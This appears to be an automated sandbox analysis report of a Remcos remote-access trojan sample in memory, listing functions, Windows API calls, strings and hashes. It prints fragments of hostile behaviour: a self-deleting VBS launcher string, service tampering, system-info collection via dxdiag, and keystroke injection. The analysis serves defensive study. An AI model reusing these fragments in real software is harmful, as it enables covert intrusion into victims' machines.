Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free
String ID: <VF$<VF$@VF$pAF$tAF
API String ID: 269201875-3149002956
Opcode ID: f3d3651c9261cb9f84c59ef2b30ac48ba80aedc7a28c02d9b5b11a582e0a71d9
Instruction ID: c61609b52f92b179b45dad1ed7c922baca2b62edbd6b2c6063e6288bfe8cdad6
Opcode Fuzzy Hash: f3d3651c9261cb9f84c59ef2b30ac48ba80aedc7a28c02d9b5b11a582e0a71d9
Instruction Fuzzy Hash: D961C171D00205AFEB20CF69C942B9ABBF5EF49310F64416BF944EB381E7B49D419B98

Function 0041322D Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 66serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,00412BE9,00000000), ref: 0041323C
OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,00412BE9,00000000), ref: 00413253
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00412BE9,00000000), ref: 00413260
ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,00412BE9,00000000), ref: 0041326F
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00412BE9,00000000), ref: 00413280
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00412BE9,00000000), ref: 00413283

Strings

+A, xrefs: 00413247, 004132B9

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID: +A
API String ID: 221034970-2476349683
Opcode ID: 87095fb4385b29cdfbcfcc0e04afdad436b789fd3cb9dc4a6ab262c150b21f18
Instruction ID: 17f09bffcb53596e9d4bf123afaf80ec38c88fef937fd9beb363d4db4ef8fd0f
Opcode Fuzzy Hash: 87095fb4385b29cdfbcfcc0e04afdad436b789fd3cb9dc4a6ab262c150b21f18
Instruction Fuzzy Hash: E611E575D411187FD7206F649C89CFF3B6CDB4635AB00016AFA0593140DB784E4BAAF9

Function 004490DF Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00448DAD: CreateFileW.KERNEL32(00000000,00000000,?,00449188,?,?,00000000,?,00449188,00000000,0000000C), ref: 00448DCA

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FF8BC35D), ref: 004491F3
__dosmaperr.LIBCMT ref: 004491FA
GetFileType.KERNEL32(00000000), ref: 00449206
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FF8BC35D), ref: 00449210
__dosmaperr.LIBCMT ref: 00449219
CloseHandle.KERNEL32(00000000), ref: 00449239
CloseHandle.KERNEL32(00000000), ref: 00449383
GetLastError.KERNEL32 ref: 004493B5
__dosmaperr.LIBCMT ref: 004493BC

Strings

H, xrefs: 00449341

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 8d7a2b3c8dcf4971788ba7bd61f1ef9ec662810f8d5bf56b9beabc5b2d52b55d
Instruction ID: 16c0764251db30d38a12b5a8a02ae212f1302cce09ed6aaf32cd13814bbbde86
Opcode Fuzzy Hash: 8d7a2b3c8dcf4971788ba7bd61f1ef9ec662810f8d5bf56b9beabc5b2d52b55d
Instruction Fuzzy Hash: F2A13732A141049FEF19DF68DC527AF7BA0AB4A324F14019EF811EB391DB789C12DB59

Function 00408DE1 Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 147COMMON

Download Yara Rule

APIs

Part of subcall function 0040D18B: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,00467F30), ref: 0040D1A7
Part of subcall function 0040D18B: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 0040D1C0
Part of subcall function 0040D18B: RegCloseKey.ADVAPI32(00000000), ref: 0040D1CB

GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 00408E36
ShellExecuteW.SHELL32(00000000,open,00000000,0045962C,0045962C,00000000), ref: 00408F95
ExitProcess.KERNEL32 ref: 00408FA1

Strings

exepath, xrefs: 00408E0E
open, xrefs: 00408F8F
""", 0, xrefs: 00408EBE
Temp, xrefs: 00408E77
CreateObject("WScript.Shell").Run "cmd /c "", xrefs: 00408ED6
.vbs, xrefs: 00408E3C
CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName), xrefs: 00408F44

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseExecuteExitFileModuleNameOpenProcessQueryShellValue
String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
API String ID: 2135335499-2411266221
Opcode ID: 43d2f52dcf9efa6c94e87b8956494bd2f4746e0ba2e80e1d0218f41f511895a1
Instruction ID: fa2d1577ff6c4dd0df342fc96389c47364483780c04f7bcf008f7b77c4008c2c
Opcode Fuzzy Hash: 43d2f52dcf9efa6c94e87b8956494bd2f4746e0ba2e80e1d0218f41f511895a1
Instruction Fuzzy Hash: 7E413A31910118ABDB09FB61DC52DEE7729AF50305F14017FB506B70D2EE7C6E4ACA58

Function 0040900F Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 138COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040915E

Strings

SystemDrive, xrefs: 00409065
ProgramFiles, xrefs: 00409135
ProgramData, xrefs: 00409126
AppData, xrefs: 00409118
\system32, xrefs: 00409082
Temp, xrefs: 0040903D
UserProfile, xrefs: 0040911F
WinDir, xrefs: 0040906F, 00409090, 004090DB
\SysWOW64, xrefs: 004090CD

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: LongNamePath
String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
API String ID: 82841172-425784914
Opcode ID: 0983152f58672d7fb224ec8f0c82a130f8ed3df98b64ce04b4db88e8d923456f
Instruction ID: 593ac968e999b6fcb1afa8f523a49b2eed45a3e0272f2412b35337e24cb28c51
Opcode Fuzzy Hash: 0983152f58672d7fb224ec8f0c82a130f8ed3df98b64ce04b4db88e8d923456f
Instruction Fuzzy Hash: 69411E31901105AADB05FBA2ED578EE77789E60319B20403FB912761D3EF7C2F0D8659

Function 004032EE Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?), ref: 0040330D
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004033BD
TranslateMessage.USER32(?), ref: 004033CC
DispatchMessageA.USER32(?), ref: 004033D7
HeapCreate.KERNEL32(00000000,00000000,00000000), ref: 0040348F
HeapFree.KERNEL32(00000000,00000000,?), ref: 004034C7

Part of subcall function 004018E7: send.WS2_32(?,00000000,00000000,00000000), ref: 0040195A

Strings

GetMessage, xrefs: 00403446
CloseChat, xrefs: 00403457
DisplayMessage, xrefs: 0040343A

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
String ID: CloseChat$DisplayMessage$GetMessage
API String ID: 2956720200-749203953
Opcode ID: 9ae08c32307eef31fb7c5aaa0f3b11f8ecc84999c156523786cfad43494257fa
Instruction ID: d860b0a56e94f76641ef76a8e7973dae8c749e614e4092a13e3eb52c91ae7d72
Opcode Fuzzy Hash: 9ae08c32307eef31fb7c5aaa0f3b11f8ecc84999c156523786cfad43494257fa
Instruction Fuzzy Hash: 3F41C3326043009BCB00BF76DD9A86F7BA9AB85704F00053EF906A71D1EE7CDA09C75A

Function 0043C520 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0043C534

Part of subcall function 0043BEB5: HeapFree.KERNEL32(00000000,00000000,?,00442E80,00000000,00000000,00000000,00000000,?,00443124,00000000,00000007,00000000,?,0044366F,00000000), ref: 0043BECB
Part of subcall function 0043BEB5: GetLastError.KERNEL32(00000000,?,00442E80,00000000,00000000,00000000,00000000,?,00443124,00000000,00000007,00000000,?,0044366F,00000000,00000000), ref: 0043BEDD

_free.LIBCMT ref: 0043C540
_free.LIBCMT ref: 0043C54B
_free.LIBCMT ref: 0043C556
_free.LIBCMT ref: 0043C561
_free.LIBCMT ref: 0043C56C
_free.LIBCMT ref: 0043C577
_free.LIBCMT ref: 0043C582
_free.LIBCMT ref: 0043C58D
_free.LIBCMT ref: 0043C59B

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 6349429f7da4dd04bd671fcc7f1dcaceb8753db72f2eaaffcae1a764faca52b2
Instruction ID: c50bc2256fd40bb6b8c60e6ce880829711fb0bf02a5bbaa2345148bc22db0d7c
Opcode Fuzzy Hash: 6349429f7da4dd04bd671fcc7f1dcaceb8753db72f2eaaffcae1a764faca52b2
Instruction Fuzzy Hash: D211A776504108BFCB11EF59C892DDD3BA5EF08354F4150AAFB188B222DB35DA509FC8

Function 0040E5BB Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 164COMMON

Download Yara Rule

Strings

udp, xrefs: 0040E65A, 0040E662, 0040E666
65535, xrefs: 0040E5C0

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: 65535$udp
API String ID: 0-1267037602
Opcode ID: 392f821c8fdb78c16ca5c60518ad7c8d75f9996d43e8d60c91428dcb4e3f1822
Instruction ID: 84486ce2f1bb3f426333e4d3ad8243f8e990da5f3cf8287c7bce91a3dc9f0a7e
Opcode Fuzzy Hash: 392f821c8fdb78c16ca5c60518ad7c8d75f9996d43e8d60c91428dcb4e3f1822
Instruction Fuzzy Hash: EE51E335600205ABDB248F2AD809BBB3764AB45340F088C7BEC45A73D1E73ECD618A69

Function 004499C4 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0044A50F), ref: 004499E7

Strings

acos, xrefs: 00449B5F
pow, xrefs: 00449ACB, 00449B77, 00449B8A
exp, xrefs: 00449AAC, 00449B0E
log, xrefs: 00449A8D, 00449A99
sqrt, xrefs: 00449B6B
log10, xrefs: 00449A31, 00449A81
asin, xrefs: 00449B53

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: DecodePointer
String ID: acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-3064271455
Opcode ID: abac6ed4de59e9d36f3893022c793c30d9b27768f13e93e51af2ea34c8abeae1
Instruction ID: 110063cd0ce05d1060d43825b6a991279bdf802adc29d45c0d9515e70b7eb71e
Opcode Fuzzy Hash: abac6ed4de59e9d36f3893022c793c30d9b27768f13e93e51af2ea34c8abeae1
Instruction Fuzzy Hash: F751AF7090054ACBEF10DF68E94C4AEBBB0FB49315F60418BD880B7255CB79AD28EB1D

Function 00410870 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 104sleepfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00409474: char_traits.LIBCPMT ref: 00409484

ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 004108D0

Part of subcall function 004149E0: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,00000000,00000000,00000000,?,004108FA), ref: 004149FD

Sleep.KERNEL32(00000064), ref: 004108FC
DeleteFileW.KERNEL32(00000000), ref: 0041092C

Strings

open, xrefs: 004108CA
\sysinfo.txt, xrefs: 0041087B
/t , xrefs: 004108AF
temp, xrefs: 00410880
dxdiag, xrefs: 004108C5

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$CreateDeleteExecuteShellSleepchar_traits
String ID: /t $\sysinfo.txt$dxdiag$open$temp
API String ID: 2701014334-2001430897
Opcode ID: 008cc4f7b0c914fe1523b4adbe8bd57e3db729cf936fec5275829b02cea6f498
Instruction ID: e682aa32545da1075197413550dedd9039f207d5310d298ab226810ec4c53ad6
Opcode Fuzzy Hash: 008cc4f7b0c914fe1523b4adbe8bd57e3db729cf936fec5275829b02cea6f498
Instruction Fuzzy Hash: 0A314F719101189ADB08FBA1DC92EEE7724AF50705F40017FF506770D2EE785E8ACA5D

Function 00415962 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48windowstringCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041597B

Part of subcall function 00415A14: RegisterClassExA.USER32(00000030), ref: 00415A60
Part of subcall function 00415A14: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 00415A7B
Part of subcall function 00415A14: GetLastError.KERNEL32 ref: 00415A85

ExtractIconA.SHELL32(00000000,?,00000000), ref: 004159B2
lstrcpynA.KERNEL32(00467A60,Remcos,00000080), ref: 004159CC
Shell_NotifyIconA.SHELL32(00000000,00467A48), ref: 004159E2
TranslateMessage.USER32(?), ref: 004159EE
DispatchMessageA.USER32(?), ref: 004159F8
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00415A05

Strings

Remcos, xrefs: 004159BD

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
String ID: Remcos
API String ID: 1970332568-165870891
Opcode ID: 6840af3b0f868fa075757d5fdcec3e3c970199560f76d4881f8831560035f363
Instruction ID: c8a284d08dd33ebe47548fa3d4bc7f9e15ad04814d582944d5373042d6cfd863
Opcode Fuzzy Hash: 6840af3b0f868fa075757d5fdcec3e3c970199560f76d4881f8831560035f363
Instruction Fuzzy Hash: E5018471944248EBD7109FE1ED4CEDF7BBCEB86B09F00013AF50592560EBB84545CB6A

Function 0044048C Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e30597776c45aa2582d7b1d23d143fd14eda843a11527f82129a35e01b5cacec
Instruction ID: 47e32140ea42008b6e2fbe39e058ee49646603e651697782d258c77751b7765d
Opcode Fuzzy Hash: e30597776c45aa2582d7b1d23d143fd14eda843a11527f82129a35e01b5cacec
Instruction Fuzzy Hash: 60C1FA70E042459FEF11DFA8D841BAEBBB0BF4D310F14419AEA14A7392C7789951CF69

Function 004470F5 Relevance: 13.8, APIs: 9, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,004473CE,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 004471A1
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,004473CE,00000000,00000000,?,00000001,?,?,?,?), ref: 00447224
__alloca_probe_16.LIBCMT ref: 0044725C
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,004473CE,?,004473CE,00000000,00000000,?,00000001,?,?,?,?), ref: 004472B7
__alloca_probe_16.LIBCMT ref: 00447306
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,004473CE,00000000,00000000,?,00000001,?,?,?,?), ref: 004472CE

Part of subcall function 0043B5D9: HeapAlloc.KERNEL32(00000000,0042CBD9,?,?,0042E317,?,?,5.2.0 Light,?,?,004095E3,0042CBD9,?,?,?,?), ref: 0043B60B

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,004473CE,00000000,00000000,?,00000001,?,?,?,?), ref: 0044734A
__freea.LIBCMT ref: 00447375
__freea.LIBCMT ref: 00447381

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocHeapInfo
String ID:
API String ID: 3256262068-0
Opcode ID: c8600d0b581eb7119826d261fca458afb9551a92d86b143f35584071ee995311
Instruction ID: 0a2115d0f49871cf642610963fb2ef61daaf79bca83d118575b9579562c159e9
Opcode Fuzzy Hash: c8600d0b581eb7119826d261fca458afb9551a92d86b143f35584071ee995311
Instruction Fuzzy Hash: 0991B271E082169AEB208FA5CC81EEF7BB5AB09354F14465BED01E6341D73CDC42D7A8

Function 0043A847 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0043C614: GetLastError.KERNEL32(?,00000000,0043783C,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C618
Part of subcall function 0043C614: _free.LIBCMT ref: 0043C64B
Part of subcall function 0043C614: SetLastError.KERNEL32(00000000,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C68C
Part of subcall function 0043C614: _abort.LIBCMT ref: 0043C692

_memcmp.LIBVCRUNTIME ref: 0043AAF1
_free.LIBCMT ref: 0043AB62
_free.LIBCMT ref: 0043AB7B
_free.LIBCMT ref: 0043ABAD
_free.LIBCMT ref: 0043ABB6
_free.LIBCMT ref: 0043ABC2

Strings

C, xrefs: 0043A9AF

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free$ErrorLast$_abort_memcmp
String ID: C
API String ID: 1679612858-1037565863
Opcode ID: 8f8f0cdc7adba91ced7f4618c4b3471fa8c11071e8b07e19bac8f0bcd20b1c00
Instruction ID: c4661d0a74ae8308ead59343ecbb51613a8cf0527b1561a261068459944c83cc
Opcode Fuzzy Hash: 8f8f0cdc7adba91ced7f4618c4b3471fa8c11071e8b07e19bac8f0bcd20b1c00
Instruction Fuzzy Hash: 0BB15975A012199FDB24DF18C884BAEB7B5FF48304F1045AEE949A7350E734AE90CF85

Function 0040E33B Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 225COMMON

Download Yara Rule

Strings

tcp, xrefs: 0040E48C
udp, xrefs: 0040E462

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: tcp$udp
API String ID: 0-3725065008
Opcode ID: 4ea1a0624809739be7cb6ad35bad68ba6a1498aee19020f9739b75e3dd0165ed
Instruction ID: 2cfa6809cb724154de7c5257ff097518599a902fbcec9cb31fa9a61e5e6da04f
Opcode Fuzzy Hash: 4ea1a0624809739be7cb6ad35bad68ba6a1498aee19020f9739b75e3dd0165ed
Instruction Fuzzy Hash: 54817E70A00216EBDF248F96C94566A7BB1EF04315F14887BE805B73D0E778CD61DB99

Function 004110EE Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 108filesynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 0041133B: __EH_prolog.LIBCMT ref: 00411340

WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004111EB
CloseHandle.KERNEL32(00000000), ref: 004111F4
DeleteFileA.KERNEL32(00000000), ref: 00411203
ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 004111B7

Part of subcall function 004018E7: send.WS2_32(?,00000000,00000000,00000000), ref: 0040195A

Strings

@, xrefs: 00411199
<, xrefs: 00411192
Temp, xrefs: 0041110F

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
String ID: <$@$Temp
API String ID: 1704390241-1032778388
Opcode ID: 1ce1cf3da0da969298fcf9dce4e914b28ddf8fb34e6c32fd8aacfb729fc4a8e4
Instruction ID: f7fd7360526dce7b80c1252073eef177887262dc2d48c10ab8877ccdce07747f
Opcode Fuzzy Hash: 1ce1cf3da0da969298fcf9dce4e914b28ddf8fb34e6c32fd8aacfb729fc4a8e4
Instruction Fuzzy Hash: 3B41B431A002099BDB15FB61DD5AAEE7734AF10305F40417EF606760E2EF781E89CB99

Function 00404E08 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 106fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00406B5E: char_traits.LIBCPMT ref: 00406B79

CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000), ref: 00404E61
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00404EA9
CloseHandle.KERNEL32(00000000), ref: 00404EE3
MoveFileW.KERNEL32(00000000,00000000), ref: 00404EFB
CloseHandle.KERNEL32(?), ref: 00404F1F
DeleteFileW.KERNEL32(00000000), ref: 00404F2E

Strings

.part, xrefs: 00404E2A

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreateDeleteMoveWritechar_traits
String ID: .part
API String ID: 820096542-3499674018
Opcode ID: 6aefee781c8191061b57c7c32ce252a4d3636f2671c29e5a59886ede381611fb
Instruction ID: 7c0ed4d063a9e04155bbcfc9f8ad653c8c905adfc315915fd9f293c083df040d
Opcode Fuzzy Hash: 6aefee781c8191061b57c7c32ce252a4d3636f2671c29e5a59886ede381611fb
Instruction Fuzzy Hash: 54315EB5D00219ABCB04EFA5DD468EEB778FB44315F1085BAFA01B7190DB746E44CB98

Function 004131C6 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 45serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,00412D7B,00000000), ref: 004131D5
OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,00412D7B,00000000), ref: 004131E9
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00412D7B,00000000), ref: 004131F6
ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,00412D7B,00000000), ref: 00413205
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00412D7B,00000000), ref: 00413217
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00412D7B,00000000), ref: 0041321A

Strings

{-A, xrefs: 004131DD, 0041321C

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID: {-A
API String ID: 221034970-2249487690
Opcode ID: 401f4a1600f5178c27bfe92e88e268514c7c3588f5d37f863d5ae499bed1e7ef
Instruction ID: 7e647667e6c08bc6e9fb8e637e579d569d58eb8f592d23d6fbd5c62d0da24c2c
Opcode Fuzzy Hash: 401f4a1600f5178c27bfe92e88e268514c7c3588f5d37f863d5ae499bed1e7ef
Instruction Fuzzy Hash: C6F046359012187BD3206F659C4AEBF3B6CCB86356F000026FE0893141DF388E4685F8

Function 0043CC17 Relevance: 12.2, APIs: 8, Instructions: 216COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00436E4A,00436E4A,?,?,?,0043CE68,00000001,00000001,36E85006), ref: 0043CC71
__alloca_probe_16.LIBCMT ref: 0043CCA9
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0043CE68,00000001,00000001,36E85006,?,?,?), ref: 0043CCF7
__alloca_probe_16.LIBCMT ref: 0043CD8E
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,36E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0043CDF1
__freea.LIBCMT ref: 0043CDFE

Part of subcall function 0043B5D9: HeapAlloc.KERNEL32(00000000,0042CBD9,?,?,0042E317,?,?,5.2.0 Light,?,?,004095E3,0042CBD9,?,?,?,?), ref: 0043B60B

__freea.LIBCMT ref: 0043CE07
__freea.LIBCMT ref: 0043CE2C

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 2597970681-0
Opcode ID: 42cc483bc2611a049f0cb3c7574fc9816d8302f951a5dbce1ebaaaff924a952f
Instruction ID: 16551e4f37cd50cf7fbfb2aa30d37855c537b24eff3af83edd6829f607421f63
Opcode Fuzzy Hash: 42cc483bc2611a049f0cb3c7574fc9816d8302f951a5dbce1ebaaaff924a952f
Instruction Fuzzy Hash: CF51E772600216ABEB258F65CCC2EBF7BA9EB48754F15562AFC05E6240DB38DC50C798

Function 00412851 Relevance: 12.1, APIs: 8, Instructions: 118keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,00000003,0000001C,00000000,00000000,00000003,00000004), ref: 00412897
SendInput.USER32(00000001,00000003,0000001C,00000000,00000000,00000000,00000003,00000004), ref: 004128BB
SendInput.USER32(00000001,00000003,0000001C,00000000,00000000,00000000,00000003,00000004), ref: 004128DE
SendInput.USER32(00000001,00000003,0000001C,00000000,00000000,00000000,00000003,00000004), ref: 004128FB
SendInput.USER32(00000001,?,0000001C), ref: 0041291A
SendInput.USER32(00000001,?,0000001C), ref: 0041293C
SendInput.USER32(00000001,?,0000001C), ref: 0041295C
SendInput.USER32(00000001,?), ref: 0041297D

Part of subcall function 00412844: MapVirtualKeyA.USER32(00000000,00000000), ref: 0041284A

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InputSend$Virtual
String ID:
API String ID: 1167301434-0
Opcode ID: 4c57448a38bb73011fe1d8cbfc53ccb25ff581db71d2bf486c24c5fff60de6aa
Instruction ID: 24ca5d00d02f7653e18acf6bc68dbc8fd38b51cab6d69bb73ca3533017ab6641
Opcode Fuzzy Hash: 4c57448a38bb73011fe1d8cbfc53ccb25ff581db71d2bf486c24c5fff60de6aa
Instruction Fuzzy Hash: 8D318771D4034CA6EB14EBE5DD01FEFBBB89F59700F00011BE500B7191D6F95A558BA5

